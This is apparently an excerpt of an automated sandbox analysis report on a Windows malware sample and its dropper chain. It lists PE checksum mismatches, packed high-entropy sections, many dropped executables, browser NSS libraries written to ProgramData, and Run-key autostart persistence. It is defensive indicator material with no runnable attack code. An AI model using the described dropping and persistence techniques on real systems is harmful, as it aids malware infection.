                    Source: e6e4c20fad.exe.5.drStatic PE information: real checksum: 0x4fae65 should be: 0x5026b7
                    Source: DJj.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x4d466
                    Source: graph.exe.24.drStatic PE information: real checksum: 0x0 should be: 0x46f82
                    Source: cMTqzvmx9u.exeStatic PE information: real checksum: 0x31ccf6 should be: 0x31ec04
                    Source: random[2].exe0.5.drStatic PE information: real checksum: 0x0 should be: 0x88ff0
                    Source: f53b3c5fe2.exe.5.drStatic PE information: real checksum: 0x1d4149 should be: 0x1d15dc
                    Source: b9ba85c997.exe.5.drStatic PE information: real checksum: 0x1e4847 should be: 0x1dfc35
                    Source: 7620ab885d.exe.5.drStatic PE information: real checksum: 0x2d1643 should be: 0x2db872
                    Source: random[3].exe2.5.drStatic PE information: real checksum: 0x2b2306 should be: 0x2bd36c
                    Source: random[3].exe0.5.drStatic PE information: real checksum: 0x1e4847 should be: 0x1dfc35
                    Source: 8469cb4d4d.exe.5.drStatic PE information: real checksum: 0x1d4149 should be: 0x1d15dc
                    Source: random[2].exe1.5.drStatic PE information: real checksum: 0x0 should be: 0x9f7ff
                    Source: skotes.exe.0.drStatic PE information: real checksum: 0x31ccf6 should be: 0x31ec04
                    Source: 68f6adf5d5.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x9f7ff
                    Source: random[1].exe.5.drStatic PE information: real checksum: 0x1d4149 should be: 0x1d15dc
                    Source: random[4].exe0.5.drStatic PE information: real checksum: 0x1e3012 should be: 0x1e6e5f
                    Source: aa8c9de034.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x9f7ff
                    Source: b285303eae.exe.5.drStatic PE information: real checksum: 0x1d5977 should be: 0x1d1f8d
                    Source: random[1].exe2.5.drStatic PE information: real checksum: 0x1d5977 should be: 0x1d1f8d
                    Source: E8X4KAZW48ZU3YY0Y4JPME949S3Q.exe.29.drStatic PE information: real checksum: 0x4fae65 should be: 0x5026b7
                    Source: 7ddd2a748c.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x88ff0
                    Source: 24da220eed.exe.5.drStatic PE information: real checksum: 0x1e3012 should be: 0x1e6e5f
                    Source: random[3].exe.5.drStatic PE information: real checksum: 0x44e278 should be: 0x44f8e8
                    Source: random[2].exe2.5.drStatic PE information: real checksum: 0x4fae65 should be: 0x5026b7
                    Source: random[1].exe0.5.drStatic PE information: real checksum: 0x0 should be: 0x2fb3e7
                    Source: 96e283ac77.exe.5.drStatic PE information: real checksum: 0x2b2306 should be: 0x2bd36c
                    Source: 6b06c8a266.exe.5.drStatic PE information: real checksum: 0x44e278 should be: 0x44f8e8
                    Source: MZHUJDVAZFQBUC9CQYK.exe.29.drStatic PE information: real checksum: 0x2b2306 should be: 0x2bd36c
                    Source: 0a7e8af92e.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x2fb3e7
                    Source: cMTqzvmx9u.exeStatic PE information: section name:
                    Source: cMTqzvmx9u.exeStatic PE information: section name: .idata
                    Source: cMTqzvmx9u.exeStatic PE information: section name: qbaikvfg
                    Source: cMTqzvmx9u.exeStatic PE information: section name: scclittj
                    Source: cMTqzvmx9u.exeStatic PE information: section name: .taggant
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name: .idata
                    Source: skotes.exe.0.drStatic PE information: section name: qbaikvfg
                    Source: skotes.exe.0.drStatic PE information: section name: scclittj
                    Source: skotes.exe.0.drStatic PE information: section name: .taggant
                    Source: 7620ab885d.exe.5.drStatic PE information: section name:
                    Source: 7620ab885d.exe.5.drStatic PE information: section name: .rsrc
                    Source: 7620ab885d.exe.5.drStatic PE information: section name: .idata
                    Source: 7620ab885d.exe.5.drStatic PE information: section name: ibdqnddj
                    Source: 7620ab885d.exe.5.drStatic PE information: section name: izikvcoa
                    Source: 7620ab885d.exe.5.drStatic PE information: section name: .taggant
                    Source: random[3].exe.5.drStatic PE information: section name:
                    Source: random[3].exe.5.drStatic PE information: section name: .idata
                    Source: random[3].exe.5.drStatic PE information: section name:
                    Source: random[3].exe.5.drStatic PE information: section name: xyfieepk
                    Source: random[3].exe.5.drStatic PE information: section name: lpcplxjb
                    Source: random[3].exe.5.drStatic PE information: section name: .taggant
                    Source: random[1].exe.5.drStatic PE information: section name:
                    Source: random[1].exe.5.drStatic PE information: section name: .idata
                    Source: random[1].exe.5.drStatic PE information: section name:
                    Source: random[1].exe.5.drStatic PE information: section name: wekcazbo
                    Source: random[1].exe.5.drStatic PE information: section name: ttllozcv
                    Source: random[1].exe.5.drStatic PE information: section name: .taggant
                    Source: 8469cb4d4d.exe.5.drStatic PE information: section name:
                    Source: 8469cb4d4d.exe.5.drStatic PE information: section name: .idata
                    Source: 8469cb4d4d.exe.5.drStatic PE information: section name:
                    Source: 8469cb4d4d.exe.5.drStatic PE information: section name: wekcazbo
                    Source: 8469cb4d4d.exe.5.drStatic PE information: section name: ttllozcv
                    Source: 8469cb4d4d.exe.5.drStatic PE information: section name: .taggant
                    Source: random[1].exe0.5.drStatic PE information: section name:
                    Source: random[1].exe0.5.drStatic PE information: section name:
                    Source: random[1].exe0.5.drStatic PE information: section name:
                    Source: random[1].exe0.5.drStatic PE information: section name:
                    Source: random[1].exe0.5.drStatic PE information: section name:
                    Source: random[1].exe0.5.drStatic PE information: section name:
                    Source: random[1].exe0.5.drStatic PE information: section name:
                    Source: random[1].exe0.5.drStatic PE information: section name:
                    Source: 0a7e8af92e.exe.5.drStatic PE information: section name:
                    Source: 0a7e8af92e.exe.5.drStatic PE information: section name:
                    Source: 0a7e8af92e.exe.5.drStatic PE information: section name:
                    Source: 0a7e8af92e.exe.5.drStatic PE information: section name:
                    Source: 0a7e8af92e.exe.5.drStatic PE information: section name:
                    Source: 0a7e8af92e.exe.5.drStatic PE information: section name:
                    Source: 0a7e8af92e.exe.5.drStatic PE information: section name:
                    Source: 0a7e8af92e.exe.5.drStatic PE information: section name:
                    Source: random[1].exe1.5.drStatic PE information: section name:
                    Source: random[1].exe1.5.drStatic PE information: section name: .rsrc
                    Source: random[1].exe1.5.drStatic PE information: section name: .idata
                    Source: random[1].exe1.5.drStatic PE information: section name: ibdqnddj
                    Source: random[1].exe1.5.drStatic PE information: section name: izikvcoa
                    Source: random[1].exe1.5.drStatic PE information: section name: .taggant
                    Source: random[2].exe.5.drStatic PE information: section name: .fptable
                    Source: ba944ca4ff.exe.5.drStatic PE information: section name: .fptable
                    Source: random[1].exe2.5.drStatic PE information: section name:
                    Source: random[1].exe2.5.drStatic PE information: section name: .idata
                    Source: random[1].exe2.5.drStatic PE information: section name:
                    Source: random[1].exe2.5.drStatic PE information: section name: aseoxclk
                    Source: random[1].exe2.5.drStatic PE information: section name: dunhoeap
                    Source: random[1].exe2.5.drStatic PE information: section name: .taggant
                    Source: b285303eae.exe.5.drStatic PE information: section name:
                    Source: b285303eae.exe.5.drStatic PE information: section name: .idata
                    Source: b285303eae.exe.5.drStatic PE information: section name:
                    Source: b285303eae.exe.5.drStatic PE information: section name: aseoxclk
                    Source: b285303eae.exe.5.drStatic PE information: section name: dunhoeap
                    Source: b285303eae.exe.5.drStatic PE information: section name: .taggant
                    Source: random[3].exe0.5.drStatic PE information: section name:
                    Source: random[3].exe0.5.drStatic PE information: section name: .idata
                    Source: random[3].exe0.5.drStatic PE information: section name:
                    Source: random[3].exe0.5.drStatic PE information: section name: qppoenam
                    Source: random[3].exe0.5.drStatic PE information: section name: qzwmqxvv
                    Source: random[3].exe0.5.drStatic PE information: section name: .taggant
                    Source: b9ba85c997.exe.5.drStatic PE information: section name:
                    Source: b9ba85c997.exe.5.drStatic PE information: section name: .idata
                    Source: b9ba85c997.exe.5.drStatic PE information: section name:
                    Source: b9ba85c997.exe.5.drStatic PE information: section name: qppoenam
                    Source: b9ba85c997.exe.5.drStatic PE information: section name: qzwmqxvv
                    Source: b9ba85c997.exe.5.drStatic PE information: section name: .taggant
                    Source: random[2].exe2.5.drStatic PE information: section name:
                    Source: random[2].exe2.5.drStatic PE information: section name: .idata
                    Source: random[2].exe2.5.drStatic PE information: section name: esuubaeu
                    Source: random[2].exe2.5.drStatic PE information: section name: sfvezqry
                    Source: random[2].exe2.5.drStatic PE information: section name: .taggant
                    Source: e6e4c20fad.exe.5.drStatic PE information: section name:
                    Source: e6e4c20fad.exe.5.drStatic PE information: section name: .idata
                    Source: e6e4c20fad.exe.5.drStatic PE information: section name: esuubaeu
                    Source: e6e4c20fad.exe.5.drStatic PE information: section name: sfvezqry
                    Source: e6e4c20fad.exe.5.drStatic PE information: section name: .taggant
                    Source: f53b3c5fe2.exe.5.drStatic PE information: section name:
                    Source: f53b3c5fe2.exe.5.drStatic PE information: section name: .idata
                    Source: f53b3c5fe2.exe.5.drStatic PE information: section name:
                    Source: f53b3c5fe2.exe.5.drStatic PE information: section name: wekcazbo
                    Source: f53b3c5fe2.exe.5.drStatic PE information: section name: ttllozcv
                    Source: f53b3c5fe2.exe.5.drStatic PE information: section name: .taggant
                    Source: random[3].exe2.5.drStatic PE information: section name:
                    Source: random[3].exe2.5.drStatic PE information: section name: .idata
                    Source: random[3].exe2.5.drStatic PE information: section name: rqcwpexm
                    Source: random[3].exe2.5.drStatic PE information: section name: viefdblt
                    Source: random[3].exe2.5.drStatic PE information: section name: .taggant
                    Source: 96e283ac77.exe.5.drStatic PE information: section name:
                    Source: 96e283ac77.exe.5.drStatic PE information: section name: .idata
                    Source: 96e283ac77.exe.5.drStatic PE information: section name: rqcwpexm
                    Source: 96e283ac77.exe.5.drStatic PE information: section name: viefdblt
                    Source: 96e283ac77.exe.5.drStatic PE information: section name: .taggant
                    Source: 6b06c8a266.exe.5.drStatic PE information: section name:
                    Source: 6b06c8a266.exe.5.drStatic PE information: section name: .idata
                    Source: 6b06c8a266.exe.5.drStatic PE information: section name:
                    Source: 6b06c8a266.exe.5.drStatic PE information: section name: xyfieepk
                    Source: 6b06c8a266.exe.5.drStatic PE information: section name: lpcplxjb
                    Source: 6b06c8a266.exe.5.drStatic PE information: section name: .taggant
                    Source: random[4].exe0.5.drStatic PE information: section name:
                    Source: random[4].exe0.5.drStatic PE information: section name: .idata
                    Source: random[4].exe0.5.drStatic PE information: section name:
                    Source: random[4].exe0.5.drStatic PE information: section name: uiswpquv
                    Source: random[4].exe0.5.drStatic PE information: section name: ziulmwng
                    Source: random[4].exe0.5.drStatic PE information: section name: .taggant
                    Source: 24da220eed.exe.5.drStatic PE information: section name:
                    Source: 24da220eed.exe.5.drStatic PE information: section name: .idata
                    Source: 24da220eed.exe.5.drStatic PE information: section name:
                    Source: 24da220eed.exe.5.drStatic PE information: section name: uiswpquv
                    Source: 24da220eed.exe.5.drStatic PE information: section name: ziulmwng
                    Source: 24da220eed.exe.5.drStatic PE information: section name: .taggant
                    Source: MZHUJDVAZFQBUC9CQYK.exe.29.drStatic PE information: section name:
                    Source: MZHUJDVAZFQBUC9CQYK.exe.29.drStatic PE information: section name: .idata
                    Source: MZHUJDVAZFQBUC9CQYK.exe.29.drStatic PE information: section name: rqcwpexm
                    Source: MZHUJDVAZFQBUC9CQYK.exe.29.drStatic PE information: section name: viefdblt
                    Source: MZHUJDVAZFQBUC9CQYK.exe.29.drStatic PE information: section name: .taggant
                    Source: E8X4KAZW48ZU3YY0Y4JPME949S3Q.exe.29.drStatic PE information: section name:
                    Source: E8X4KAZW48ZU3YY0Y4JPME949S3Q.exe.29.drStatic PE information: section name: .idata
                    Source: E8X4KAZW48ZU3YY0Y4JPME949S3Q.exe.29.drStatic PE information: section name: esuubaeu
                    Source: E8X4KAZW48ZU3YY0Y4JPME949S3Q.exe.29.drStatic PE information: section name: sfvezqry
                    Source: E8X4KAZW48ZU3YY0Y4JPME949S3Q.exe.29.drStatic PE information: section name: .taggant
                    Source: freebl3.dll.31.drStatic PE information: section name: .00cfg
                    Source: freebl3[1].dll.31.drStatic PE information: section name: .00cfg
                    Source: mozglue.dll.31.drStatic PE information: section name: .00cfg
                    Source: mozglue[1].dll.31.drStatic PE information: section name: .00cfg
                    Source: msvcp140.dll.31.drStatic PE information: section name: .didat
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeCode function: 0_2_00B1D91C push ecx; ret 0_2_00B1D92F
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeCode function: 0_2_00B11359 push es; ret 0_2_00B1135A
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BED91C push ecx; ret 2_2_00BED92F
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00BED91C push ecx; ret 3_2_00BED92F
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00C00D50 pushfd ; retf 9_3_00C00D51
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00C00D50 pushfd ; retf 9_3_00C00D51
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00C00D50 pushfd ; retf 9_3_00C00D51
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00C00D50 pushfd ; retf 9_3_00C00D51
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00C00D50 pushfd ; retf 9_3_00C00D51
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00BFE985 push ds; iretd 9_3_00BFE987
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00BFE985 push ds; iretd 9_3_00BFE987
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00BFE985 push ds; iretd 9_3_00BFE987
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00BFE985 push ds; iretd 9_3_00BFE987
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00C01120 push ecx; retf 9_3_00C0112A
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00C01120 push ecx; retf 9_3_00C0112A
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00C01120 push ecx; retf 9_3_00C0112A
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00C01120 push ecx; retf 9_3_00C0112A
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00C01120 push ecx; retf 9_3_00C0112A
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00C01120 push ecx; retf 9_3_00C0112A
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00BFE985 push ds; iretd 9_3_00BFE987
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00BFE985 push ds; iretd 9_3_00BFE987
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00BFE985 push ds; iretd 9_3_00BFE987
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00BFE985 push ds; iretd 9_3_00BFE987
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00BF057D push eax; ret 9_3_00BF0581
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00BF057D push eax; ret 9_3_00BF0581
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00BF057D push eax; ret 9_3_00BF0581
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00BF057D push eax; ret 9_3_00BF0581
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00BEEE69 pushfd ; iretd 9_3_00BEFA84
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00BEEE69 pushfd ; iretd 9_3_00BEFA84
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00BFE73C push FFFFFF85h; retf 9_3_00BFE812
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_3_00BFE73C push FFFFFF85h; retf 9_3_00BFE812
                    Source: cMTqzvmx9u.exeStatic PE information: section name: entropy: 6.951830958774063
                    Source: skotes.exe.0.drStatic PE information: section name: entropy: 6.951830958774063
                    Source: 7620ab885d.exe.5.drStatic PE information: section name: entropy: 7.986463733135728
                    Source: random[3].exe.5.drStatic PE information: section name: xyfieepk entropy: 7.9542694260581
                    Source: random[1].exe.5.drStatic PE information: section name: entropy: 7.980952558000639
                    Source: random[1].exe.5.drStatic PE information: section name: wekcazbo entropy: 7.952954751128578
                    Source: 8469cb4d4d.exe.5.drStatic PE information: section name: entropy: 7.980952558000639
                    Source: 8469cb4d4d.exe.5.drStatic PE information: section name: wekcazbo entropy: 7.952954751128578
                    Source: random[1].exe1.5.drStatic PE information: section name: entropy: 7.986463733135728
                    Source: random[1].exe2.5.drStatic PE information: section name: entropy: 7.9770039853719545
                    Source: random[1].exe2.5.drStatic PE information: section name: aseoxclk entropy: 7.953504917666834
                    Source: b285303eae.exe.5.drStatic PE information: section name: entropy: 7.9770039853719545
                    Source: b285303eae.exe.5.drStatic PE information: section name: aseoxclk entropy: 7.953504917666834
                    Source: random[3].exe0.5.drStatic PE information: section name: entropy: 7.9824607911183225
                    Source: random[3].exe0.5.drStatic PE information: section name: qppoenam entropy: 7.953050880306917
                    Source: b9ba85c997.exe.5.drStatic PE information: section name: entropy: 7.9824607911183225
                    Source: b9ba85c997.exe.5.drStatic PE information: section name: qppoenam entropy: 7.953050880306917
                    Source: f53b3c5fe2.exe.5.drStatic PE information: section name: entropy: 7.980952558000639
                    Source: f53b3c5fe2.exe.5.drStatic PE information: section name: wekcazbo entropy: 7.952954751128578
                    Source: 6b06c8a266.exe.5.drStatic PE information: section name: xyfieepk entropy: 7.9542694260581
                    Source: random[4].exe0.5.drStatic PE information: section name: uiswpquv entropy: 7.9490516523806445
                    Source: 24da220eed.exe.5.drStatic PE information: section name: uiswpquv entropy: 7.9490516523806445

                    Persistence and Installation Behavior

                    barindex
                    Creates files in the system32 config directory
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeFile created: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\vcruntime140[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1021718001\6b06c8a266.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\msvcp140[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1021719001\24da220eed.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeFile created: C:\Program Files\Windows Media Player\graph\graph.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\mozglue[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1021720001\91732ff836.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[3].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[4].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile created: C:\Users\user\AppData\Local\Temp\MZHUJDVAZFQBUC9CQYK.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1021721001\f53b3c5fe2.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\freebl3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[3].exeJump to dropped file
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exeJump to dropped file
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile created: C:\Users\user\AppData\Local\Temp\E8X4KAZW48ZU3YY0Y4JPME949S3Q.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nss3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[2].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1021722001\aa8c9de034.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[3].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeJump to dropped file
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[2].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[4].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\softokn3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[3].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file

                    Boot Survival

                    barindex
                    Creates multiple autostart registry keys
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 96e283ac77.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e6e4c20fad.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeRegistry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fb584dabd7.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b9ba85c997.exeJump to behavior
